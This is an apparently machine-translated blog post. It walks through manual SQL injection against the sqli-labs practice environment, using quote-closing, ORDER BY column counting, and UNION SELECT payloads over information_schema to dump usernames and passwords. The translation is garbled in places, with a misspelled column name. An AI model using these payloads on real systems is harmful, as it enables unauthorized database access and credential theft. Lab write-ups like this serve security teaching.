Based on manual injection being given

Disclaimer: This article is a blogger original article, follow the CC 4.0 BY-SA copyright agreement, reproduced, please attach the original source link and this statement.

This link: https://blog.csdn.net/qq_23066945/article/details/102771727

Based on manual injection being given

Experiment Environment: sqlli
1. First prompted to enter parameters and values as the ID

2. Building id parameter returns to normal

3. enter the escape character \ obtain error information "1") within quotation marks on the LIMIT 0,1 (picture was given the information, so this removes two quotation marks)

thus, we can probably get a SQL statement

select * from users where id=("1") limit 0,1

After the contents of the attempt to close the single quotation marks, and the comment input 1 ") - +

select * from users where id=("  1") --+ ") limit 0,1

See page can return to normal

4. After closure, the input order by determining a few fields. 5, it is judged normal page is returned successfully

five fields being given input 4 input 3 attempts to

enter the order by the time 3, the page is returned to normal, indicating that there are three field

5. Next, use the union joint inquiry to see which positions may be utilized
first parameter error, id to -1
Second construct statements union select 1,2,3 (detected three fields before)

return instructions 2 and 3 3 return values we want.
Replace the 2 database () to view the current database, show the success of

6, the next burst data
First name look-up table
input

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ 

Linked table, display table, from the total mysql database table, filtering criteria table name equal to the name of the current database
shows all the tables in the current database

we continue to read the users table information
input union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
link table, display field names from the total mysql table, game table name equal to the selected users of data

then I get the field values, username and password values
input union select 1,group_concat(username,0x3a,passowrd),3 from users --+
linked table to read data from the user table to display the user name password separated by a colon

and finally got what we wanted information.

End.

What is the problem you want big cousin said.